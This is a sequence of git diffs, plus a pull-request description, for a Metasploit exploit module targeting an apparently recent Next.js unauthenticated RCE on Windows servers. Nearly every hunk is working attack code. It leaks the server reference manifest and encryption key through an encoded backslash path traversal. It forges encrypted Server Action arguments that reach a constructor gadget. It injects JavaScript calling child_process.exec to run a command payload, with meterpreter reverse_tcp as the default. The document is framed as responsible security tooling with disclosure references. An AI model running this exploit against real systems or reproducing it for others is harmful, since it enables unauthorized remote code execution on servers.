+  def send_exploit_request(reference, action_id, encrypted_args, valid_fields)
+    post_data = build_post_data(reference, action_id, encrypted_args, valid_fields)
 
     data = Rex::MIME::Message.new
     post_data.each do |field|
@@ -252,7 +236,33 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_s,
       'vars_get' => {}
     )
+  end
 
+  def exploit
+    print_status('Fetching application Build ID...')
+    build_id = parse_build_id
+    print_good("Successfully retrieved Build ID: #{build_id}")
+
+    print_status('Leaking server reference manifest...')
+    manifest = leak_manifest(build_id)
+    fail_with(Msf::Module::Failure::UnexpectedReply, 'Encryption key missing in manifest') unless manifest['encryptionKey']
+
+    print_status("Searching for available Server Actions at path: #{datastore['ACTION_PATH']}...")
+    actions = parse_actions(datastore['ACTION_PATH'])
+
+    selected_action = actions.find { |act| manifest.dig('node', act[:id]) }
+    fail_with(Msf::Module::Failure::UnexpectedReply, 'Target vulnerable Server Action node not found in manifest') unless selected_action
+
+    reference = selected_action[:reference]
+    action_id = selected_action[:id]
+    valid_fields = selected_action[:valid_fields]
+    print_good("Selected Action ID: #{action_id} (Ref: #{reference})")
+
+    print_status('Encrypting bound arguments payload...')
+    encrypted_args = encrypt_bound_args(action_id, manifest['encryptionKey'])
+
+    send_exploit_request(reference, action_id, encrypted_args, valid_fields)
     print_status('Request sent, awaiting payload execution...')
   end
+
 end

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -15,18 +15,18 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Next.JS Pre-Auth RCE on Windows Servers',
+        'Name' => 'Next.js Pre-Auth RCE on Windows Servers',
         'Description' => %q{
-          This module exploits a Remote Code Execution (RCE) vulnerability in Next.js applications hosted on Windows servers.
-          Specifically crafted requests can execute arbitrary code on the target server running Next.js.
+          This module exploits a Remote Code Execution (RCE) vulnerability in Next.js applications
+          hosted on Windows servers. Specifically crafted requests can execute arbitrary code on the target server.
 
-          The affected versions include releases from 13.4.0 up to 15.5.24, and 16.0.0 up to 16.3.3.
-          The vulnerability affects applications utilizing both the Pages Router and App Router without Cache Components.
+          The affected versions include releases from 13.4.0 up to 15.5.24, and 16.0.0 up to 16.3.3,
+          utilizing both Pages and App Routers without Cache Components.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'Maksim Rogov', # Metasploit Module
-          'Bogyeom Lee', # Vulnerability Discovery
+          'Bogyeom Lee',  # Vulnerability Discovery
           'Avishek Sarkar' # Vulnerability Discovery
         ],
         'References' => [
@@ -69,9 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, datastore['PAGES_ROUTER'], datastore['PATH_SEGMENT']),
-      'headers' => {
-        'Origin' => full_uri('', vhost_uri: true).chomp('/')
-      }
+      'headers' => { 'Origin' => origin_header }
     )
     fail_with(Failure::Unreachable, 'Failed to fetch the pages using Pages Router') unless res
 
@@ -98,23 +96,18 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'GET',
       'uri' => make_traversal(target_uri.path, datastore['APP_ROUTER'], 'server-reference-manifest'),
-      'headers' => {
-        'Origin' => full_uri('', vhost_uri: true).chomp('/')
-      }
+      'headers' => { 'Origin' => origin_header }
     )
 
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => make_traversal(target_uri.path, "/_next/data/#{build_id}", datastore['PAGES_ROUTER'], 'server-reference-manifest.json'),
-      'headers' => {
-        'Origin' => full_uri('', vhost_uri: true).chomp('/')
-      }
+      'headers' => { 'Origin' => origin_header }
     )
 
     fail_with(Failure::NotVulnerable, 'Failed to leak server reference manifest') unless res && res.code == 200
 
     json_doc = res.get_json_document
-
     if json_doc.is_a?(Hash) && json_doc.dig('pageProps', datastore['PATH_SEGMENT'])
       fail_with(Failure::NotVulnerable, 'Target cache returned dynamic route fallback instead of manifest.')
     end
@@ -126,17 +119,17 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, action_path),
-      'headers' => {
-        'Origin' => full_uri('', vhost_uri: true).chomp('/')
-      }
+      'headers' => { 'Origin' => origin_header }
     )
     fail_with(Failure::Unreachable, 'Failed to load target page for action collection') unless res
 
     actions = []
     res.get_html_document.css('form').each do |form|
-      inputs = form.css('input, textarea').map { |i| [i['name'], i['type'] || 'text'] }.to_h
+      inputs = form.css('input, textarea, select').map { |i| [i['name'], i['type'] || 'text'] }.to_h
 
-      valid_fields = inputs.reject { |name, type| name.nil? || name.start_with?('$ACTION_') || %w[hidden submit button checkbox radio].include?(type.downcase) }
+      valid_fields = inputs.reject do |name, type|
+        name.nil? || name.empty? || name.start_with?('$ACTION_') || %w[submit button image file].include?(type.downcase)
+      end
 
       target_field = valid_fields.keys.first
       next unless target_field
@@ -146,7 +139,8 @@ class MetasploitModule < Msf::Exploit::Remote
         next unless ref_key && ref_key.start_with?('$ACTION_REF_')
 
         ref = ref_key.sub('$ACTION_REF_', '')
-        desc = form.at("input[name=\"$ACTION_#{ref}:0\"]")&.[]('value')
+        desc_node = form.at("input[@name='$ACTION_#{ref}:0']")
+        desc = desc_node ? desc_node['value'] : nil
         next unless desc
 
         action_id = begin
@@ -156,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
         end
         next unless action_id
 
-        actions << { reference: ref, id: action_id, field: target_field }
+        actions << { reference: ref, id: action_id, field: target_field, valid_fields: valid_fields }
       end
     end
 
@@ -183,6 +177,10 @@ class MetasploitModule < Msf::Exploit::Remote
     Base64.strict_encode64(iv + ciphertext + tag)
   end
 
+  def origin_header
+    full_uri('', vhost_uri: true).chomp('/')
+  end
+
   def check
     build_id = begin
       parse_build_id
@@ -198,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     return Exploit::CheckCode::Safe('Target is safe or cache path is protected (manifest could not be leaked)') unless manifest && manifest['encryptionKey']
 
-    Exploit::CheckCode::Vulnerable("Vulnerable build ID found: #{build_id} and encryption key successfully leaked, the target seems to be vulnerable")
+    Exploit::CheckCode::Vulnerable("Vulnerable build ID found: #{build_id} and encryption key successfully leaked")
   end
 
   def exploit
@@ -218,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     reference = selected_action[:reference]
     action_id = selected_action[:id]
-    action_field = selected_action[:field]
+    valid_fields = selected_action[:valid_fields]
     print_good("Selected Action ID: #{action_id} (Ref: #{reference})")
 
     print_status('Encrypting bound arguments payload...')
@@ -231,9 +229,14 @@ class MetasploitModule < Msf::Exploit::Remote
       { 'name' => "$ACTION_REF_#{reference}", 'data' => '' },
       { 'name' => "$ACTION_#{reference}:0", 'data' => JSON.dump({ 'id' => action_id, 'bound' => '$@1' }) },
       { 'name' => "$ACTION_#{reference}:1", 'data' => '["$@2"]' },
-      { 'name' => "$ACTION_#{reference}:2", 'data' => JSON.dump(encrypted_args) },
-      { 'name' => action_field, 'data' => js_payload }
+      { 'name' => "$ACTION_#{reference}:2", 'data' => JSON.dump(encrypted_args) }
     ]
+
+    last_field_name = valid_fields.keys.last
+    valid_fields.each_key do |field_name|
+      data_value = (field_name == last_field_name) ? js_payload : Rex::Text.rand_text_alphanumeric(6..12)
+      post_data << { 'name' => field_name, 'data' => data_value }
+    end
 
     data = Rex::MIME::Message.new
     post_data.each do |field|
@@ -244,9 +247,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, datastore['ACTION_PATH']),
-      'headers' => {
-        'Origin' => full_uri('', vhost_uri: true).chomp('/')
-      },
+      'headers' => { 'Origin' => origin_header },
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => data.to_s,
       'vars_get' => {}
@@ -254,5 +255,4 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Request sent, awaiting payload execution...')
   end
-
 end

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -1,0 +1,256 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'openssl'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Next.JS Pre-Auth RCE on Windows Servers',
+        'Description' => %q{
+          This module exploits a Remote Code Execution (RCE) vulnerability in Next.js applications hosted on Windows servers.
+          Specifically crafted requests can execute arbitrary code on the target server running Next.js.
+
+          The affected versions include releases from 13.4.0 up to 15.5.24, and 16.0.0 up to 16.3.3.
+          The vulnerability affects applications utilizing both the Pages Router and App Router without Cache Components.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'Bogyeom Lee', # Vulnerability Discovery
+          'Avishek Sarkar' # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', '2026-75604'],
+        ],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Next.js >=13.4 <15.5.24, >=16.0 <16.3.3 / Windows payload',
+            {
+              'Platform' => ['windows']
+              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2026-08-26',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [UNRELIABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to the Next.JS App', '/']),
+        OptString.new('CACHE_PATH', [true, 'Cache directory name used by the app', 'app-cache']),
+        OptString.new('ACTION_PATH', [true, 'Path to the page containing the Server Action form', '/'])
+      ]
+    )
+  end
+
+  def parse_build_id
+    return @cached_build_id if @cached_build_id
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, datastore['CACHE_PATH'], 'seed'),
+      'headers' => {
+        'Origin' => full_uri('', vhost_uri: true).chomp('/')
+      }
+    )
+    fail_with(Failure::Unreachable, 'Failed to fetch cache seed page') unless res
+
+    html = res.get_html_document
+    script = html.at('script[@id="__NEXT_DATA__"]')
+    fail_with(Failure::NotVulnerable, '__NEXT_DATA__ script tag not found') unless script
+
+    json_data = JSON.parse(script.text)
+    @cached_build_id = json_data['buildId'] || fail_with(Failure::NotVulnerable, 'Build ID missing in configuration')
+  rescue JSON::ParserError
+    fail_with(Failure::BadConfig, 'Failed to parse JSON from __NEXT_DATA__')
+  end
+
+  def make_traversal(*parts, sequence: '..%5C')
+    path = normalize_uri(*parts)
+    route_dirs = path.sub(%r{^/_next/data/[^/]+}, '').split('/')[1..-2] || []
+    depth = [route_dirs.size + 1, 1].max
+    path.sub(%r{/([^/]+)$}, "/#{(sequence * depth)}\\1")
+  end
+
+  def leak_manifest(build_id)
+    return @cached_manifest if @cached_manifest
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => make_traversal(target_uri.path, 'app-cache', 'server-reference-manifest'),
+      'headers' => {
+        'Origin' => full_uri('', vhost_uri: true).chomp('/')
+      }
+    )
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => make_traversal(target_uri.path, "/_next/data/#{build_id}", datastore['CACHE_PATH'], 'server-reference-manifest.json'),
+      'headers' => {
+        'Origin' => full_uri('', vhost_uri: true).chomp('/')
+      }
+    )
+
+    fail_with(Failure::NotVulnerable, 'Failed to leak server reference manifest') unless res && res.code == 200
+
+    json_doc = res.get_json_document
+
+    if json_doc.is_a?(Hash) && json_doc.dig('pageProps', 'rest')
+      fail_with(Failure::NotVulnerable, 'Target cache returned dynamic route fallback instead of manifest.')
+    end
+
+    @cached_manifest = json_doc || fail_with(Failure::NotVulnerable, 'Manifest body is empty or invalid')
+  end
+
+  def parse_actions(action_path)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, action_path),
+      'headers' => {
+        'Origin' => full_uri('', vhost_uri: true).chomp('/')
+      }
+    )
+    fail_with(Failure::Unreachable, 'Failed to load target page for action collection') unless res
+
+    actions = []
+    res.get_html_document.css('form').each do |form|
+      inputs = form.css('input, textarea').map { |i| [i['name'], i['type'] || 'text'] }.to_h
+
+      valid_fields = inputs.reject { |name, type| name.nil? || name.start_with?('$ACTION_') || %w[hidden submit button checkbox radio].include?(type.downcase) }
+
+      target_field = valid_fields.keys.first
+      next unless target_field
+
+      form.css('input[name]').each do |input|
+        ref_key = input['name']
+        next unless ref_key && ref_key.start_with?('$ACTION_REF_')
+
+        ref = ref_key.sub('$ACTION_REF_', '')
+        desc = form.at("input[name=\"$ACTION_#{ref}:0\"]")&.[]('value')
+        next unless desc
+
+        action_id = begin
+          JSON.parse(desc)['id']
+        rescue StandardError
+          nil
+        end
+        next unless action_id
+
+        actions << { reference: ref, id: action_id, field: target_field }
+      end
+    end
+
+    fail_with(Failure::NotVulnerable, 'No compatible Server Actions found on the specified path') if actions.empty?
+    actions
+  end
+
+  def encrypt_bound_args(action_id, encryption_key)
+    flight = "1:{}\n0:[\"$1:constructor:constructor\"]\n"
+    iv = Random.new.bytes(16)
+    plaintext = action_id.to_s + flight
+
+    key_bytes = Base64.strict_decode64(encryption_key)
+    cipher = OpenSSL::Cipher.new("aes-#{key_bytes.bytesize * 8}-gcm")
+    cipher.encrypt
+    cipher.key = key_bytes
+    cipher.iv_len = 16
+    cipher.iv = iv
+    cipher.auth_data = ''
+
+    ciphertext = cipher.update(plaintext) + cipher.final
+    tag = cipher.auth_tag
+
+    Base64.strict_encode64(iv + ciphertext + tag)
+  end
+
+  def check
+    build_id = begin
+      parse_build_id
+    rescue StandardError
+      nil
+    end
+    return Exploit::CheckCode::Unknown('Failed to retrieve build ID. Target may not be running Next.js') unless build_id
+
+    manifest = begin
+      leak_manifest(build_id)
+    rescue StandardError
+      nil
+    end
+    return Exploit::CheckCode::Safe('Target is safe or cache path is protected (manifest could not be leaked)') unless manifest && manifest['encryptionKey']
+
+    Exploit::CheckCode::Vulnerable("Vulnerable build ID found: #{build_id} and encryption key successfully leaked, the target seems to be vulnerable")
+  end
+
+  def exploit
+    print_status('Fetching application Build ID...')
+    build_id = parse_build_id
+    print_good("Successfully retrieved Build ID: #{build_id}")
+
+    print_status('Leaking server reference manifest...')
+    manifest = leak_manifest(build_id)
+    fail_with(Failure::NotVulnerable, 'Encryption key missing in manifest') unless manifest['encryptionKey']
+
+    print_status("Searching for available Server Actions at path: #{datastore['ACTION_PATH']}...")
+    actions = parse_actions(datastore['ACTION_PATH'])
+
+    selected_action = actions.find { |act| manifest.dig('node', act[:id]) }
+    fail_with(Failure::NotVulnerable, 'Target vulnerable Server Action node not found in manifest') unless selected_action
+
+    reference = selected_action[:reference]
+    action_id = selected_action[:id]
+    action_field = selected_action[:field]
+    print_good("Selected Action ID: #{action_id} (Ref: #{reference})")
+
+    print_status('Encrypting bound arguments payload...')
+    encrypted_args = encrypt_bound_args(action_id, manifest['encryptionKey'])
+
+    js_bytes = "String.fromCharCode(#{payload.encoded.bytes.join(',')})"
+    js_payload = "return process.mainModule.require('child_process').exec(#{js_bytes})"
+
+    post_data = [
+      { 'name' => "$ACTION_REF_#{reference}", 'data' => '' },
+      { 'name' => "$ACTION_#{reference}:0", 'data' => JSON.dump({ 'id' => action_id, 'bound' => '$@1' }) },
+      { 'name' => "$ACTION_#{reference}:1", 'data' => '["$@2"]' },
+      { 'name' => "$ACTION_#{reference}:2", 'data' => JSON.dump(encrypted_args) },
+      { 'name' => action_field, 'data' => js_payload }
+    ]
+
+    data = Rex::MIME::Message.new
+    post_data.each do |field|
+      data.add_part(field['data'], nil, nil, "form-data; name=\"#{field['name']}\"")
+    end
+
+    print_status('Sending exploit request to target server...')
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, datastore['ACTION_PATH']),
+      'headers' => {
+        'Origin' => full_uri('', vhost_uri: true).chomp('/')
+      },
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s,
+      'vars_get' => {}
+    )
+
+    print_status('Request sent, awaiting payload execution...')
+  end
+
+end

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Next.js Pre-Auth RCE on Windows Servers',
+        'Name' => 'Next.js Unauthenticated RCE on Windows Servers',
         'Description' => %q{
           This module exploits a Remote Code Execution (RCE) vulnerability in Next.js applications
           hosted on Windows servers. Specifically crafted requests can execute arbitrary code on the target server.
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Avishek Sarkar' # Vulnerability Discovery
         ],
         'References' => [
-          ['CVE', '2026-75604'],
+          ['CVE', '2026-75604']
         ],
         'Arch' => [ARCH_CMD],
         'Targets' => [
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('APP_ROUTER', [true, 'Path to the page using App Router']),
         OptString.new('PAGES_ROUTER', [true, 'Path to the page using Pages Router']),
         OptString.new('PATH_SEGMENT', [false, 'Any dynamic path segment for App and Pages routers']),
-        OptString.new('TARGET_FIELD', [false, 'The specific form field name to inject the payload into (must match the variable used in the closure, e.g. lastName)']),
+        OptString.new('TARGET_FIELD', [false, 'The specific form field name to inject the payload into, must match the last variable used in the closure (unset = defaults to the last field)']),
         OptString.new('ACTION_PATH', [true, 'Path to the page containing the Server Action form'])
       ]
     )
@@ -188,7 +188,7 @@ class MetasploitModule < Msf::Exploit::Remote
     valid_fields = extract_form_valid_fields(form)
     return [] if valid_fields.empty?
 
-    target_field = form.css('input[type="text"], textarea').map { |i| i['name'] }.find { |n| valid_fields.key?(n) } || valid_fields.keys.first
+    target_field = form.css('input[type="text"], textarea').map { |i| i['name'] }.find { |n| valid_fields.key?(n) } || valid_fields.keys.last
 
     form_actions = []
     form.css('input[name]').each do |input|
@@ -244,8 +244,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Safe('Target is safe or cache path is protected (manifest could not be leaked)') unless manifest&.key?('encryptionKey')
 
     Exploit::CheckCode::Vulnerable("Vulnerable build ID found: #{build_id} and encryption key successfully leaked")
-  rescue StandardError => e
-    vprint_error("Check failed with exception: #{e.message}")
+  rescue StandardError
     Exploit::CheckCode::Unknown('An error occurred while checking the target.')
   end
 
@@ -261,7 +260,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ]
 
     target_field = datastore['TARGET_FIELD']
-    payload_field_name = (target_field.present? && valid_fields.key?(target_field)) ? target_field : valid_fields.keys.first
+    payload_field_name = (target_field.present? && valid_fields.key?(target_field)) ? target_field : valid_fields.keys.last
 
     valid_fields.each do |field_name, default_value|
       data_value = (field_name == payload_field_name) ? js_payload : default_value
@@ -279,7 +278,6 @@ class MetasploitModule < Msf::Exploit::Remote
       data.add_part(field['data'], nil, nil, "form-data; name=\"#{field['name']}\"")
     end
 
-    print_status('Sending exploit request to target server...')
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, datastore['ACTION_PATH']),
@@ -289,7 +287,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => {}
     )
 
-    fail_with(Failure::Unreachable, "#{peer} - Failed to receive valid response from target server") unless res&.code == 200
+    if res&.code == 500
+      fail_with(Failure::UnexpectedReply, "#{peer} - Server returned 500 Internal Server Error. This usually indicates a SyntaxError (payload might have landed in the wrong place instead of the last argument in the closure. Try specifying TARGET_FIELD manually).")
+    elsif res&.code != 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code: #{res.code}")
+    end
 
     res
   end
@@ -320,8 +322,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Encrypting bound arguments payload...')
     encrypted_args = encrypt_bound_args(action_id, manifest['encryptionKey'])
 
+    print_status('Sending exploit request to target server...')
     send_exploit_request(reference, action_id, encrypted_args, valid_fields)
-    print_status('Request sent, awaiting payload execution...')
+    print_good('Received HTTP 200 OK response, awaiting payload execution...')
   end
 
 end

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -55,8 +55,9 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Path to the Next.JS App', '/']),
-        OptString.new('APP_CACHE_PATH', [true, 'Cache directory name used by the app', 'app-cache']),
-        OptString.new('PAGES_CACHE_PATH', [true, 'Pages cache directory name used by the app', 'pages-cache']),
+        OptString.new('APP_ROUTER', [true, 'Path to the page using App Router']),
+        OptString.new('PAGES_ROUTER', [true, 'Path to the page using Pages Router']),
+        OptString.new('PATH_SEGMENT', [true, 'Dynamic path segment for App and Pages routers']),
         OptString.new('ACTION_PATH', [true, 'Path to the page containing the Server Action form', '/'])
       ]
     )
@@ -67,12 +68,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, datastore['PAGES_CACHE_PATH'], 'seed'),
+      'uri' => normalize_uri(target_uri.path, datastore['PAGES_ROUTER'], datastore['PATH_SEGMENT']),
       'headers' => {
         'Origin' => full_uri('', vhost_uri: true).chomp('/')
       }
     )
-    fail_with(Failure::Unreachable, 'Failed to fetch cache seed page') unless res
+    fail_with(Failure::Unreachable, 'Failed to fetch the pages using Pages Router') unless res
 
     html = res.get_html_document
     script = html.at('script[@id="__NEXT_DATA__"]')
@@ -96,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'GET',
-      'uri' => make_traversal(target_uri.path, datastore['APP_CACHE_PATH'], 'server-reference-manifest'),
+      'uri' => make_traversal(target_uri.path, datastore['APP_ROUTER'], 'server-reference-manifest'),
       'headers' => {
         'Origin' => full_uri('', vhost_uri: true).chomp('/')
       }
@@ -104,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => make_traversal(target_uri.path, "/_next/data/#{build_id}", datastore['PAGES_CACHE_PATH'], 'server-reference-manifest.json'),
+      'uri' => make_traversal(target_uri.path, "/_next/data/#{build_id}", datastore['PAGES_ROUTER'], 'server-reference-manifest.json'),
       'headers' => {
         'Origin' => full_uri('', vhost_uri: true).chomp('/')
       }
@@ -114,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     json_doc = res.get_json_document
 
-    if json_doc.is_a?(Hash) && json_doc.dig('pageProps', 'rest')
+    if json_doc.is_a?(Hash) && json_doc.dig('pageProps', datastore['PATH_SEGMENT'])
       fail_with(Failure::NotVulnerable, 'Target cache returned dynamic route fallback instead of manifest.')
     end
 

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, datastore['APP_ROUTER'], path_segment),
       'headers' => { 'Origin' => origin_header }
     )
-    return nil unless res&.code == 200
+    return nil unless res && res.code == 200
 
     doc = res.get_html_document
     return nil unless doc
@@ -124,6 +124,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def leak_manifest(build_id)
     return @cached_manifest if @cached_manifest
 
+    # Trigger an App Router request with path traversal (..%5C) to escape the
+    # expected cache directory on Windows and force the server to generate a
+    # cache artifact (.html) on disk next to the internal manifest
     send_request_cgi(
       'method' => 'GET',
       'uri' => make_traversal(target_uri.path, datastore['APP_ROUTER'], 'server-reference-manifest'),
@@ -135,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => make_traversal(target_uri.path, "/_next/data/#{build_id}", datastore['PAGES_ROUTER'], 'server-reference-manifest.json'),
       'headers' => { 'Origin' => origin_header }
     )
-    return nil unless res&.code == 200
+    return nil unless res && res.code == 200
 
     json_doc = begin
       res.get_json_document
@@ -153,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, action_path),
       'headers' => { 'Origin' => origin_header }
     )
-    fail_with(Failure::Unreachable, 'Failed to load target page for action collection') unless res&.code == 200
+    fail_with(Failure::Unreachable, 'Failed to load target page for action collection') unless res && res.code == 200
 
     actions = []
     res.get_html_document.css('form').each do |form|
@@ -215,10 +218,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def encrypt_bound_args(action_id, encryption_key)
     flight = "1:{}\n0:[\"$1:constructor:constructor\"]\n"
-    iv = Random.new.bytes(16)
+    iv = SecureRandom.random_bytes(16)
     plaintext = action_id.to_s + flight
 
-    key_bytes = Base64.strict_decode64(encryption_key)
+    key_bytes = begin Base64.strict_decode64(encryption_key.to_s)
+    rescue ArgumentError
+      fail_with(Failure::UnexpectedReply, 'Encryption key is not valid base64')
+    end
+    unless [16, 24, 32].include?(key_bytes.bytesize)
+      fail_with(Failure::UnexpectedReply, "Unexpected encryption key length: #{key_bytes.bytesize}")
+    end
+
     cipher = OpenSSL::Cipher.new("aes-#{key_bytes.bytesize * 8}-gcm")
     cipher.encrypt
     cipher.key = key_bytes
@@ -286,10 +296,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_s,
       'vars_get' => {}
     )
+    fail_with(Failure::Unreachable, "#{peer} - No response from target") unless res
 
-    if res&.code == 500
+    if res.code == 500
       fail_with(Failure::UnexpectedReply, "#{peer} - Server returned 500 Internal Server Error. This usually indicates a SyntaxError (payload might have landed in the wrong place instead of the last argument in the closure. Try specifying TARGET_FIELD manually).")
-    elsif res&.code != 200
+    elsif res.code != 200
       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code: #{res.code}")
     end
 

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Auxiliary::Report
 
   def initialize(info = {})
     super(
@@ -30,7 +31,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'Avishek Sarkar' # Vulnerability Discovery
         ],
         'References' => [
-          ['CVE', '2026-75604']
+          ['CVE', '2026-75604'],
+          ['URL', 'https://nextjs.org/blog/august-2026-security-release'],
+          ['URL', 'https://github.com/vercel/next.js/security/advisories/GHSA-p293-qw3h-jr36'],
+          ['URL', 'https://sybr1d.xyz/posts/nextjs-path-traversal-rce-windows/']
         ],
         'Arch' => [ARCH_CMD],
         'Targets' => [
@@ -245,13 +249,49 @@ class MetasploitModule < Msf::Exploit::Remote
     full_uri('', vhost_uri: true).chomp('/')
   end
 
+  def detect_and_report_service?
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'headers' => { 'Origin' => origin_header }
+    })
+    return false unless res
+
+    is_nextjs = (res.headers['X-Powered-By'] =~ /Next\.js/i) ||
+                res.body.include?('/_next/static/') ||
+                res.body.include?('__NEXT_DATA__') ||
+                res.body.include?('__next_f.push')
+    return false unless is_nextjs
+
+    @service = report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: ssl ? 'https' : 'http',
+      info: 'Next.js application'
+    )
+
+    true
+  end
+
   def check
+    return Exploit::CheckCode::Safe('Target is not running Next.js or did not respond') unless detect_and_report_service?
+
     build_id = parse_build_id
     return Exploit::CheckCode::Unknown('Failed to retrieve build ID. Target may not be running Next.js') unless build_id
 
     manifest = leak_manifest(build_id)
     return Exploit::CheckCode::Safe('Target is safe or cache path is protected (manifest could not be leaked)') unless manifest&.key?('encryptionKey')
 
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      service: @service,
+      name: name.to_s,
+      refs: references,
+      info: "Module #{fullname} found vulnerable host"
+    )
     Exploit::CheckCode::Vulnerable("Vulnerable build ID found: #{build_id} and encryption key successfully leaked")
   rescue StandardError
     Exploit::CheckCode::Unknown('An error occurred while checking the target.')

--- a/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
+++ b/modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb
@@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS],
-
           # Session reliability depends on the page cache expiration time
           'Reliability' => [UNRELIABLE_SESSION]
         }


### PR DESCRIPTION
# Vulnerability Details

This module exploits a Remote Code Execution (RCE) vulnerability in Next.js applications hosted on Windows servers.
Specifically crafted requests can execute arbitrary code on the target server running Next.js.

The affected versions include releases from 13.4.0 up to 15.5.24, and 16.0.0 up to 16.3.3.
The vulnerability affects applications utilizing both the Pages Router and App Router without Cache Components.

# Module Information

Module path: `modules/exploits/windows/http/nextjs_unauth_rce_cve_2026_75604.rb`
Platform: Windows

# References

# Test Output

```
msf > use windows/http/nextjs_unauth_rce_cve_2026_75604
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set RHOSTS 192.168.19.159
RHOSTS => 192.168.19.159
